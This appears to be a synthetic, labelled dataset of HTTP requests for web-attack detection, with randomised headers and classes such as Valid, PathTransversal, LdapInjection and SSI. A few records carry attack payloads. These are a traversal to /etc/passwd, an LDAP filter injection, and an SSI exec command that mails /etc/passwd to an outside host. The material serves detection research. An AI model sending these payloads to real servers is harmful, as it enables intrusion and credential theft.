If-Range: Mon, 13 Jun 05 14:41:10 UTC
Max-Forwards: 0313
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: sero tcgs=n3rcmn
Authorization: emel oohcn=ey9uap
Range: 2-,67-8,8-83703
Referer: /uiviz.cgi
TE: trailers,trailers
Trailer: If-None-Match
User-Agent: Mozilla/0.9 (Machintosh; U; Mac OS X 9.1; hj-jk; rv:3.3.3) Gecko/14396671
UA-CPU: x86
UA-Disp: 529,350,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 2025x4273
Via: 6ndlex/7.9 183.179.113.71, 2.8 www.pgcrV.jpg, 8.1 www.d2a4.gif
Transfer-Encoding: compress
Upgrade: iena/2.8, eot/6.3, eoe/2.9, dteT/9.3, QCLo6/1.2
Warning: 336 www.N0ys.htm:4 "eHsiwTfaeeetyrdoo" 
X-Forwarded-For: 230.225.78.26
X-Serial-Number: 071844089
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11902
Start - Id: 16739
class: Valid
GET /gIk/etd3eoonhSWesarsdzeb/lr/htadeoH0ncLHush6us/anR/gKVz8wAk02qIx/iwire/sAVlZO/thntdehp/xYzrhVOVzEeG7Jgt7x7/ek6c9wH.sh?ee4=gtlds2si&kViframeeY.=s&b@GQ9XIHJw7f=sd3Pa&Rlb=2512&Mi0iThelen=%5BT6&hgS1tf1no=3850433&w7tsely4ajsusti=4&sotiq1miitRb=natn3tzaya&Tsaesn4ithfhTbu=r4qmR&MNgroup byzO.0Tdocument-E=0te%3Fm HTTP/1.0
Host: www.1msn.net:76
Connection: so1ieOol
Accept: */*;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.8
Accept-Language: *;q=0.3
Cache-Control: no-transform
Client-ip: 245.122.179.87
Cookie: dS8teeh=oohn4ejugD;alu6pyt=7etk;edsftrngvi=221413371;Ugroup byLpjcq@Wu=fromo;oen=a;eei7=1
Cookie2: $Version="254"
Date: Sat, 24 Sep 05 18:05:18 GMT
ETag: "AAFxZTux73Gr.JS1"
Expect: swu5ie
From: qsiyd@ithlh90i.biz
If-Modified-Since: Fri, 12 Mar 04 10:20:00 GMT
If-Unmodified-Since: Thu, 08 Sep 05 08:38:41 GMT
If-Match: "@VLRd7GeWH5sShxAhOv"
If-None-Match: "AWCD6yE@2mggPpbW_j"
If-Range: *
Max-Forwards: 403
MIME-Version: 5.2
Pragma: no-cache
Proxy-Authorization: NTLM YnRyYklvcGFpcnNuZVNTbXMybXRhZWUxbzJ0ZnNlMG1odHJ3dzl1ZWVhTGNmZW54
Authorization: Basic b2Vlc21rTDY6OHJkcg==
Range: 4-,-5,062040-983
Referer: http://taa5u.org/teykoqEh/nhx0o/ael4.jpg
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/4.1 (X11; U; Linux i386 8.5; hz-eh; rv:1.7.3) Gecko/18021966
UA-CPU: PowerPC
UA-Disp: 9773,708,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 1249x2317
Via: 2.6 www.4o2aoqde.jpg, HTTP/4.3 90.138.203.123
Transfer-Encoding: compress
Upgrade: EsEsd/5.5, ttkmft/4.3
Warning: 082 www.cyawd.gif "ulhshseXosaHnh3a" "Wed, 29 Jun 05 18:19:58 CET"
X-Forwarded-For: 125.30.59.190
X-Serial-Number: 585140076554
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~

null

End - Id: 16739
Start - Id: 4148
class: Valid
PUT /AceOallYknetcatncit4wdL/Zhrcwft/QechoZKv0dn2B@hY1/hFg6/l3nhjdr1swoEd0vu/inydeiaBleavOtnvmnef/0EailE2ibVQlo1telnet/LznttI6retibehedryyo/9kBOEDni7BSui9/aFznO/xoarsneo4rf/d.p@OF9ZTaS.2C.js? HTTP/1.1
Content-Length: 41
Content-Language: ooduy,rc
Content-Encoding: identity
Content-Location: http://www.ioBris.ch/ltnao8/8ihnh/tDroelmh/tyhcej/tiAtone1.zip
Content-MD5: b2Fpbm5uZW5hb29waWtycw==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 16 Jun 08 04:02:26 GMT
Last-Modified: Sat, 30 Jul 05 14:01:48 UTC
Host: 255.144.43.230
Connection: uedh
Accept: text/*;q=0.5, application/*;q=0.0
Accept-Charset: iso-8859-5;q=0.0, iso-2022-jp;q=0.2
Accept-Encoding: *
Accept-Language: ensL-tHbr, o-qoaeiad;q=0.4, s-pnkllxc;q=0.6, i-yititob;q=0.0
Cache-Control: max-age=380
Client-ip: 224.142.228.209
Cookie: a3Riydndptbaooe= tdj43ietBhNssa
Cookie2: $Version="041"
Date: Sun, 15 Apr 07 12:44:44 UTC
ETag: W/"_1-3WCEs8-wch4J142"
Expect: 100-continue
From: Cfmatoy@rdbndch0ft.fr
If-Modified-Since: Thu, 08 Apr 10 04:38:22 CET
If-Unmodified-Since: Wed, 14 Jul 04 22:14:09 GMT
If-Match: "5KeuNY9kXxpUaI6"
If-None-Match: "XT5JFiyxUp.9QTwpiH"
If-Range: *
Max-Forwards: 325
MIME-Version: 7.4
Pragma: no-cache
Proxy-Authorization: NTLM czJlaWRhZGlsc2w1YTNod3Zhc2Zoc2hyeXR0Y2EwS3dlcmFtdzdPZmVjZW5sSGQ=
Authorization: Digest uri=http://tqodcT1n.de/ut7e/tBtaq/yoetvrnT/ontae5M/stYggc02.swf
Range: -9,-905
Referer: http://www.qlrepna.gov/sUist/to6Rth9.jpeg
TE: trailers
Trailer: Proxy-Authorization
User-Agent: rEeFlz http://www.heoEOeuj.fr
UA-CPU: x86
UA-Disp: 192,906,16
UA-OS: Win95
UA-Color: color8
UA-Pixels: 580x4333
Via: 4.0 15.164.155.244:1, 6.1 89.61.105.121, 6.0 www.srrot.html
Transfer-Encoding: deflate
Upgrade: euxuIj/1.3, tsocun/7.9, qixenp/6.5
Warning: 169 www.6hnqjthS.shtml "rnUhnrersbrs" "Mon, 16 Aug 04 18:32:04 UTC"
X-Forwarded-For: 145.209.171.178
X-Serial-Number: 5833814723
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

gdhCretccet=0atyr&matefaUts=oyo8nsb6olIov

End - Id: 4148
Start - Id: 7787
class: Valid
PUT /HFvMaUscmdk09O/Ee/8T-mAnIZbB5Zl@7VapQY/atblnltezni.nsf? HTTP/1.1
Content-Length: 220
Content-Language: atajd
Content-Encoding: compress
Content-Location: /eklljohb.txt
Content-MD5: MjRlcG5hcElhcmNyZWNtNw==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 11 Apr 04 23:26:56 UTC
Last-Modified: Sat, 14 Oct 06 21:16:30 GMT
Host: 31.87.244.13
Connection: sljb
Accept: */*
Accept-Charset: utf-7;q=0.8, euc-cn
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 207.124.74.37
Cookie: wusrWe=mhlekeacqsE;Pdrh=9368115;nxsntzsn=ic;srJoycang=>ebint[all@~oamocha3 n/dfunion ;t0m=fstollA trdn
Cookie2: $Version="432"
Date: Sun, 19 Jun 05 05:30:36 CET
ETag: "Why3H83yM7wv-4u"
Expect: rdSt
From: 3nDoa8@6am0hOM.biz
If-Modified-Since: Sun, 21 Jan 07 21:43:50 UTC
If-Unmodified-Since: Thu, 03 Aug 06 22:31:07 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 30 Oct 06 02:37:55 GMT
Max-Forwards: 420
MIME-Version: 6.3
Pragma: no-cache
Proxy-Authorization: Digest algorithm=SqczEY
Authorization: NTLM Z2FhZTlyaU5lNWdhb2VldGh3MGR0ZW13aGRkcml1c3g0aXRvc05vbDB0bG5pNGVy
Range: -7629
Referer: http://www.waasNoo.uk/Rooocna/oadzI/6hSis0ee/9oe5n7e/Hhlc.msf
TE: trailers,trailers
Trailer: Trailer
User-Agent: Mozilla/9.3 (Machintosh; U; PPC Mac OS X 9.2; 0r-jt; rv:0.2.3) Gecko/10738751
UA-CPU: StrongARM
UA-Disp: 179,7168,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 669x1617
Via: neeolr/8.1 www.dsaa.gif:716
Transfer-Encoding: deflate
Upgrade: it6t3/5.6, Tslram/3.5, wli/0.1
Warning: 896 53.154.62.197:12 "aotastmoaeCPy7hetct" "Sun, 02 Jan 05 23:37:36 CET"
X-Forwarded-For: 187.83.170.187
X-Serial-Number: 27066605
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Aebiv0i=q nes&bvdiAeziwd6zf=924&irlhntslaIae=eaCvldzs&oySosynnp=leo8tert0ma&elulomuBam5=78135&x@-E-DbCZFj=08096&ilsHh3iO=5gcect+wliker&epEnJYQCPJVt=e he4=irni&nltauesy8aeee=scriptncl&5ymeg4naoitim=9010711&8osN=oFyheG

End - Id: 7787
Start - Id: 7676
class: Valid
POST /ek.I6cCbQ7kY5rpr/dmuE5.BONox@l@fne/J4wfsnACaGupdatekqB/Aye38aocdnit3cdAm/6roeaek/omUNu9BvS.CIj/rmnoibRoe7svni/a3nhuTqbLGpMSwk.shtml? HTTP/1.1
Content-Length: 124
Content-Language: my0ilp,i
Content-Encoding: gzip
Content-Location: /aebDto/vmaqmqa/tis6ho/poeoahey/psto0.nsf
Content-MD5: cmllRTlnblN0ZWVnY3RsZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 11 Jul 06 17:58:20 UTC
Last-Modified: Mon, 01 Feb 10 08:40:03 UTC
Host: 216.155.243.69:80
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: OTher-tt, 61hgt-wt4Dnsn;q=0.2, eadvNiu-hmo;q=0.5
Cache-Control: min-fresh=76537
Client-ip: 41.206.202.253
Cookie: h0aTV4V=nODc;QQ7RL06rZMexec=89;lta4fe=9
Cookie2: $Version="7"
Date: Tue, 25 Jan 05 21:00:38 CET
ETag: W/"mYhl_fvpClg4eLH"
Expect: 100-continue
From: iein@nruizurNh.it
If-Modified-Since: Wed, 10 Jan 07 11:36:51 GMT
If-Unmodified-Since: Thu, 14 Jul 05 09:21:59 UTC
If-Match: *
If-None-Match: "7.Bgxdy4Qx@rJFd2FC-"
If-Range: *
Max-Forwards: 5932
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: uocnn dT6my=esqesaq
Authorization: tteN 4Crpntob=gwrmTe
Range: 17508-,-69682,459349-
Referer: http://www.nebthak.ch/edyx/zg4jtedi/ie5s/ijel/eAaa2.zip
TE: trailers,chunked;q=0.3
Trailer: Accept
User-Agent: Mozilla/7.9 (Windows; U; WinNT 8.4; wj-vo; rv:9.2.6) Gecko/18976273
UA-CPU: StrongARM
UA-Disp: 803,660,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 223x0002
Via: 8.5 www.eomiho.html:445, 5.3 www.Ue4eu.jpg, lir/3.1 www.i4con6.html
Transfer-Encoding: identity
Upgrade: reasrf/4.1
Warning: 953 www.sgtzoeOm.png:0 "musiwDeiogabd1ld" "Fri, 16 Jan 04 11:28:31 GMT"
X-Forwarded-For: 116.49.9.190
X-Serial-Number: 71188820860
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~

79kT9VLDT85vbscript=299484&_g2BW29C=Ewcrt$9t&sges=ss8smrsmhtracehmo&wajotaiai=ar&nnewqs5si=p|&rtemnlitrc=tr&oCNBeE= 0lw 

End - Id: 7676
Start - Id: 43804
class: OsCommanding
GET /scripts/georgi.asp/..��..��..��file.ext? HTTP/1.0
Host: 122.86.231.76
Connection: keep-alive
Accept: image/*, audio/*, video/quicktime;q=0.9
Accept-Charset: iso-8859-4;q=0.5, x-mac-arabic;q=0.9, gb2312
Accept-Encoding: identity;q=0.0, compress, gzip, identity, compress
Accept-Language: 5nMz-nf;q=0.4
Cache-Control: min-fresh=3
Client-ip: 69.5.212.169
Cookie: arjat=fromighttp;oq8rude=wN5D7yB;Tj0p=ouziigrtnufde;@W0OnexecG5aR=7niHtls;wpsJuR=36159532;XAYEkK.gphp=Tlr t
Cookie2: $Version="9"
Date: Tue, 31 Jan 06 19:24:25 CET
ETag: "@ZVFdx6HfZRC.m2OXS8f"
Expect: u9re=alahjAwN
From: uZkpt@nesht4Iih.ch
If-Modified-Since: Sat, 09 Dec 06 22:34:46 GMT
If-Unmodified-Since: Thu, 30 Jul 09 16:31:44 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 3
MIME-Version: 0.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="h4nye"
Authorization: qutgt3 dhItvrl=r0cr5f
Range: 904036-,02113-35,44499-
Referer: http://www.eTvaih.cz/ujthatw/aslen/i7HaTnf/iiNih/Dbsei.swf
TE: trailers
Trailer: Accept-Charset
User-Agent: Mozilla/0.9 (Windows; U; Win 9x 7.5; oo-re; rv:1.8.3) Gecko/02653381
UA-CPU: Sparc
UA-Disp: 7509,580,8
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 697x813
Via: FTP/0.9 46.63.122.3:505, 6.9 81.99.54.253:659
Transfer-Encoding: deflate
Upgrade: Rteoa/6.1, seif/8.2, nnyoe1/3.7, ai7g/8.2
Warning: 815 www.nitmdae.gif "rfe4pvnricgalni" 
X-Forwarded-For: 73.32.142.166
X-Serial-Number: 055444693738
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43804
Start - Id: 2460
class: Valid
GET /nitgtyrragEl/eYzKo/0b/tW9-.iFqL/ltoehiuzmbtRtbtrxs.jpg?xhtnty7L=70&Orsf=rtxOcg%3Ba%3En&HpUlike=8&1h4m=0&h0=ta9G+&dad=sa&jtph9hec=ihr2n+r5%2FmoptaSh+6to0system&hhpe=enu%27n&pBF.nufUoVp=9759&yc=0&t0eeartn9R0m=hmtnyrw HTTP/1.0
Host: www.r2er.fr
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 65.8.54.25
Cookie: 78tHa9toss=sZu4Wi3vhV.;awyh8geaRps4=avbscripti r
Cookie2: $Version="496"
Date: Tue, 03 Jun 08 06:33:05 GMT
ETag: "@3@i0rhszFEe1CU"
Expect: 100-continue
From: 0s8tX@arsT.cz
If-Modified-Since: Sat, 24 Dec 05 02:09:19 CET
If-Unmodified-Since: Sat, 14 Mar 09 05:53:01 GMT
If-Match: "@y__usaBYoN_4Cv"
If-None-Match: "9_q4CvkG31kXZ5@qn"
If-Range: Fri, 12 Mar 04 02:35:48 GMT
Max-Forwards: 64
MIME-Version: 6.6
Pragma: C='eInUnacm'
Proxy-Authorization: ntaw7o tt7Lty8=1tmeaxs
Authorization: Basic YWVObjpJY21lZWNlbg==
Range: 87817-,2898-
Referer: http://www.bneren.org/gjotre0t/jusltt/tsts3/taet.asp
TE: chunked
Trailer: Transfer-Encoding
User-Agent: xsiubk6o (aHNlNj7-3J; s4ax@a4Z.; rVyn0t-yw; svuC6YU)
UA-CPU: x86
UA-Disp: 097,5060,32
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 900x5240
Via: rsyMtx/1.9 www.ehnrshta.htm, 6.9 www.adwcyd.js
Transfer-Encoding: aiEH
Upgrade: vpeeo/7.4
Warning: 416 www.pteq.html "largswoidrewai" "Wed, 11 Aug 04 24:11:21 GMT"
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 802306505768249437
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2460
Start - Id: 46327
class: PathTransversal
GET /tySeWAx/rK9LyKg5t/bhL-H4u0.gtlZGsz/92ArcpbodyIstylexTOechor3/ctbgdno4mts231i1vd/nnyRraCssakatmheac/equnrRerperuom/ES4eflNj5ewbtdb/30mM2UFg/d4HJ8vOnu5DKH6ZP.h/gthsfok6et1kNtr/rcppKpzYRXAThwF.jpeg?osma=91&goi1eyuilasisle=%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd&otS=380121373 HTTP/1.0
Host: www.sncteghip.it
Connection: tsex92pp
Accept: */*
Accept-Charset: iso-8859-4;q=0.4, euc-tw
Accept-Encoding: deflate;q=0.1, identity, gzip;q=0.1
Accept-Language: *
Cache-Control: min-fresh=632
Client-ip: 146.96.8.202
Cookie: ehpul4tsmemmnnd= ;ieone3e0=Rny;nsno1lifiof=0981921
Cookie2: $Version="6"
Date: Fri, 20 Jan 06 07:22:47 GMT
ETag: "implnxLQpPxIho3WyK"
Expect: 100-continue
From: sgtDwB@5isge.ch
If-Modified-Since: Sat, 30 Apr 05 17:27:34 GMT
If-Unmodified-Since: Tue, 24 Feb 09 14:54:38 GMT
If-Match: "aly.dcp-veuLEeIcK"
If-None-Match: *
If-Range: "slnPTwfk7G9XoLL7KF0S"
Max-Forwards: 3641
MIME-Version: 6.3
Pragma: idnoier='4fo2ls'
Proxy-Authorization: Digest nc=54AeEe7f
Authorization: Basic bW5oaTpTaDU5ZzRn
Range: 595-7160,98-,4-961
Referer: /negniftt.exe
TE: trailers
Trailer: Max-Forwards
User-Agent: jRmke (slIuR1; t5W-ruur; kKNeX1; mWbb3AbY)
UA-CPU: Sparc
UA-Disp: 0890,6289,8
UA-OS: Win95
UA-Color: color16
UA-Pixels: 434x579
Via: HTTP/2.3 www.edoar.png, FTP/3.6 www.i6e0s.css, HTTP/3.0 37.143.67.171
Transfer-Encoding: olIu; hsone=i93N92me
Upgrade: Dnh/3.3, iienNa/1.0, khpjt/2.7, ote6v4/0.0
Warning: 494 178.239.117.244 "Abhgtrgfsota" "Tue, 21 Mar 06 06:42:46 CET"
X-Forwarded-For: 84.224.165.18
X-Serial-Number: 5744439401
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46327
Start - Id: 11805
class: Valid
GET /tusioeneHSonz/th1iXeaigeSsnnu/aMJYMCP@B.gif?pnpifphplq=oB3yf9&hfIss=eelch&Rrustmk0oteuli=iy7lo35qS&potgiyosce=tcee%3D&hsirle=pe&ptsnNtmctml=%24a%5Di4eCk%7Enrpwtiechildm&nhhucetoitc1w6=6586 HTTP/1.1
Host: www.0diferkln.be:80
Connection: close
Accept: text/*;q=0.6, application/*;q=0.8
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 200.252.94.25
Cookie: ilhh=@SsamcalI;juwtiha=43;hhicnIRoclc=[nue;Namipao=879;ner=o3riclehtn2ox;snta=02350023
Cookie2: $Version="695"
Date: Tue, 18 Mar 08 05:19:56 UTC
ETag: "t3PcwI.VKD_8292zrHCe"
Expect: htuf
From: tnsjx@nvlaoadtiu.st
If-Modified-Since: Thu, 03 Jun 04 18:07:32 GMT
If-Unmodified-Since: Fri, 21 Sep 07 10:10:15 GMT
If-Match: *
If-None-Match: *
If-Range: Wed, 16 Aug 06 13:54:11 CET
Max-Forwards: 11
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic ZWV3YTpESHBzeQ==
Authorization: Digest cnonce="ipEs"
Range: 0942-
Referer: /nMLxysph/eSmrr/TnEapig/am7o/isloaeo.msf
TE: chunked;q=0.8,trailers
Trailer: Accept-Charset
User-Agent: Mozilla/2.5 (Machintosh; U; PPC 5.3; oe-er; rv:0.8.2) Gecko/28706894
UA-CPU: x86
UA-Disp: 580,584,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0954x9922
Via: HTTP/3.7 195.152.46.187:67273, 2.6 www.4neekml.shtml, aThms/6.0 173.233.33.232
Transfer-Encoding: identity
Upgrade: meE/0.7
Warning: 125 www.knwtlae.shtml "ad0et9kU3d4n6SuMdtN" "Thu, 30 Sep 04 09:26:08 GMT"
X-Forwarded-For: 75.214.139.60
X-Serial-Number: 63208652767395
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 11805
Start - Id: 25446
class: Valid
GET /mr/FNd6QvLvX2KX/n2HRS.JlQLG/nTyxoXDe/hoeic/2Ys2MnzI9bi/oqunae/6w-c_zm/io880htqmtF@2D.cfm?Kcy@zgQ=4&cWEevalncO=u8cB&trooatfSiryeoue=c&lrA=%5Doa&sGhcImcheaTsds=9CCjTyqI%40hw HTTP/1.0
Host: www.tiygmIr.st:4881
Connection: Nieoq
Accept: text/*, image/gif;q=0.3, text/xml
Accept-Charset: iso-2022-jp, iso-2022-kr;q=0.8
Accept-Encoding: *;q=0.0
Accept-Language: e-lbhjaht, cy5pqtfn-rnae;q=0.8, iues5-ht
Cache-Control: max-stale=88
Client-ip: 25.109.225.253
Cookie: ioi=208;Zl6RohQG=gta;taeNw6ee=q|;ahthkisbaiilnt=nlr
Cookie2: $Version="69"
Date: Fri, 11 Jul 08 04:24:25 CET
ETag: W/"_WW6LnvaU@@pnen4r"
Expect: shloenO=shAb
From: 2nOl@m8et6rtby.cz
If-Modified-Since: Fri, 01 Oct 04 18:43:02 UTC
If-Unmodified-Since: Sat, 01 Dec 07 09:29:33 GMT
If-Match: "3F5JHHmVXF_@Toz9"
If-None-Match: *
If-Range: Thu, 19 Jan 06 17:53:45 GMT
Max-Forwards: 2260
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest username="0Wocgc42"
Authorization: sctAu whssuy=qpgmoe
Range: -7599
Referer: http://nkuasne.biz/vl6oa/tc8t.mpg
TE: trailers
Trailer: Connection
User-Agent: Ctanboe8TltuihFam9
UA-CPU: x86
UA-Disp: 4448,2047,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 407x092
Via: FTP/9.1 www.tjitahde.gif, 2.9 www.adrlnt1.htm
Transfer-Encoding: compress
Upgrade: Eaqa/3.2, ndd/9.1, pel/7.0, tto1c/5.3
Warning: 426 www.nrhesd.shtml "alyndt" 
X-Forwarded-For: 62.171.11.144
X-Serial-Number: 588564161052
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25446
Start - Id: 1323
class: Valid
GET /amIseax1iai/cp2po3e/o6dXyqtbP@s8rO/sQxsJ/jgwindow.openW/0ci2lWtdu2jetgVnkta/aafursle/eyyTOlusat0mc6eu1i/rb.php3?dbs7ay=srouBsacrisaejdme&STYsteno7qwgo=+as6&uctrotE=macideolm&ny4.=wp-ggejsmnOR%3Cedo&gXWI0=drcRt&antt5nw4Ac=543390&T6b_K=604869899&afJEslroes783v=312&bii=08&ec=inedredoee4hecodeb&oustgrnttsRddi=77490&oO7uD2=ft&OYZzLNpassthrusam6system=eE9+ebOhsvdr2w HTTP/1.1
Host: 82.6.67.181
Connection: cgiifr4
Accept: application/*, audio/basic
Accept-Charset: gb2312;q=0.0, iso-8859-8-i;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: only-if-cached
Client-ip: 16.141.86.214
Cookie: rwEky=437187;trEieeag6fesgOa=sNS;4e=seuze;oi8orv=9ls)ain  wtoyh;Jupdate-0dhtpassb-=je/;htqojehef=acrw1D
Cookie2: $Version="854"
Date: Wed, 25 Oct 06 15:00:34 CET
ETag: "cdzAjY0NJ4jEVrTNe"
Expect: 100-continue
From: strldbE@9qmhittm.gov
If-Modified-Since: Tue, 23 Mar 04 01:44:14 GMT
If-Unmodified-Since: Sun, 27 Nov 05 11:14:46 UTC
If-Match: "nm3vm9xdMqFqhSC36KB"
If-None-Match: *
If-Range: *
Max-Forwards: 53
MIME-Version: 4.4
Pragma: repkhOe=D
Proxy-Authorization: e9vjnk aure=ntiF
Authorization: os0tte Hhcl=l6orCcng
Range: -216
Referer: http://rlnTwe.cz/a8h7ha/ovelt/dtofs.cgi
TE: chunked,trailers,chunked;q=0.5
Trailer: Accept-Language
User-Agent: trtsior (wOMDn2k; ilxIX9; kU5IF5; iBIwY8; fKXpQHH-07)
UA-CPU: Sparc
UA-Disp: 512,7635,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 290x591
Via: HTTP/7.6 138.136.158.34:238, FTP/8.5 191.145.28.153:2161
Transfer-Encoding: esnisF
Upgrade: t7rs/3.9, wsOC/1.9, elcLbb/7.5, yutxee/3.6, sz6enA/6.2
Warning: 222 www.adbe.jpg "ebprbkhtcfatduen" "Mon, 20 Mar 06 12:05:20 UTC"
X-Forwarded-For: 47.248.188.232
X-Serial-Number: 6191285179418731
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 1323
Start - Id: 38482
class: LdapInjection
GET /lh/a8GVJuMx5URhb47DU8L/laW0ShTptY_tz@TkJ/hfeohileaei/nLvhiGdaD4tbsO8iS/caSldha4E/1ertoyoe/or3bX_LLOWTaMUXUrbuf.js?cuoIi9ep1ur=saH-fqHI0&Lwheezoj=j&hs=%29++++%28%7C++++%28neld%3DyulLw*%29&lm=d+%25h%7CrT&eo=at&etratehRmwnA=utitt2Eh HTTP/1.0
Host: 245.2.254.17:80
Connection: cBh1fr
Accept: */*;q=0.9
Accept-Charset: *;q=0.2
Accept-Encoding: gzip;q=0.0, compress, gzip, deflate;q=0.4, identity
Accept-Language: *
Cache-Control: min-fresh=597
Client-ip: 50.101.101.125
Cookie: edmismI=jeledtimASnjti8m;6Scp5ahtmeenb=tnAratrti|f4ozdelete;hdmsomrbrbtiee=shiyiM=select(Coo-t=46a;eseLr9toteuado=42128326
Cookie2: $Version="51"
Date: Wed, 24 Aug 05 07:31:04 UTC
ETag: W/"HdLDJ1hGjmZABeS"
Expect: stre=tmrfue
From: b8antatt@o1neid.cz
If-Modified-Since: Mon, 09 Nov 09 24:09:15 GMT
If-Unmodified-Since: Sun, 01 Aug 04 16:57:57 CET
If-Match: *
If-None-Match: *
If-Range: "gHtCQ_GNSjsam_ynpF"
Max-Forwards: 7
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest opaque="kmaaul"
Authorization: NTLM NHJtbktVblI4QXJ3Mm1ubGdzaXI5aW9kZmVPd2JwbGdmZWR0czc=
Range: 58935-,-048057,4298-
Referer: http://www.tdmoy.it/1vfEIa.mp3
TE: chunked,gzip,gzip
Trailer: Cache-Control
User-Agent: 3etrbchlcmeoe
UA-CPU: 68000
UA-Disp: 3037,4035,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 6621x951
Via: 1.7 www.ilemwtvh.tiff, HTTP/5.1 131.93.125.246
Transfer-Encoding: identity
Upgrade: Nlohim/6.2, ors/6.8, ine/9.2, aauq/0.7, cvl87u/8.4
Warning: 917 www.ashesmu.htm "elta4zdhaod" "Sun, 11 Jul 04 04:27:49 UTC"
X-Forwarded-For: 96.44.37.3
X-Serial-Number: 8565701730547644653
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38482
Start - Id: 40196
class: SSI
GET /1N/rFoxe..Rc/tct23aiwVBgApaAE/cCb.css?t2mR2E=taetbsock_streamol&frAhtPn=144&ioeaa0aio=mFfk7&tiynctqsUi3=au0_d5L&dIeos0aotpel=uhQO8ouu5&bgsoundc.andIR=170631&t@5-u76fBvu=0278&Mobject2GIOevalQhR=mincludedinsertautoexece&sihyi=144&nso0a=%3C%21--++++%23exec+++++cmd%3D%22%2Fbin%2Fmail+++++aellwg.com+++%3C+++++%2Fetc%2Fpasswd%22--%3E&ifjmcn77=%3B5%5Bt&stc=e8C0IY HTTP/1.0
Host: www.vNfs.st:80
Connection: eaglmhs
Accept: */*;q=0.9
Accept-Charset: iso-8859-1, x-mac-hebrew, euc-jp
Accept-Encoding: deflate
Accept-Language: *;q=0.4
Cache-Control: only-if-cached
Client-ip: 75.82.91.174
Cookie: ies=selectpassthru;r.f.51W0O=sie;afDbo9p=69970;n1tjwoszs=oyrww
Cookie2: $Version="5"
Date: Fri, 29 Sep 06 09:00:01 GMT
ETag: "@BYOpdJ6S6t7PhQHXVU"
Expect: 100-continue
From: beevy@rdaeiuersl.de
If-Modified-Since: Wed, 06 Sep 06 01:53:09 CET
If-Unmodified-Since: Sat, 17 Nov 07 11:48:55 GMT
If-Match: "-gKSHtXORuiqF@oV"
If-None-Match: *
If-Range: Fri, 11 Jan 08 05:44:12 UTC
Max-Forwards: 9706
MIME-Version: 7.7
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Digest cnonce="ttma1tHn"
Range: -8389
Referer: http://DaNiuI.org/Hiur/xesqckie/lte4edm/sos78wdo.jpeg
TE: trailers,gzip,trailers
Trailer: Transfer-Encoding
User-Agent: Mozilla/1.5 (compatible; ewas; SunOS sun4u; sensLds; iseHnisuw; deah)
UA-CPU: 68000
UA-Disp: 134,343,32
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 9646x716
Via: 4.8 163.155.226.241
Transfer-Encoding: nkz86; fosil=losAnh
Upgrade: aiaEi/3.2, nenl/7.3
Warning: 193 214.100.46.242 "rhape" 
X-Serial-Number: 5910838983690
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40196
Start - Id: 20504
class: Valid
GET /rtdt/Xa74/torueeef/OmLlm/slIcr/b8IKY-zmT-A3yUY/mW6C6yVugPDZ/ijR/9vp7cAnpE_.html?discHtqWli=o%3Edse+iN9yndis8&imgYG%ux=zSiehuNdnet&eeatyr1A=nondho5sf0ul&iprsan=afieweiWekhtytoa&heeioht=671630&ays=e+t HTTP/1.1
Host: 94.132.60.112
Connection: close
Accept: */*;q=0.7
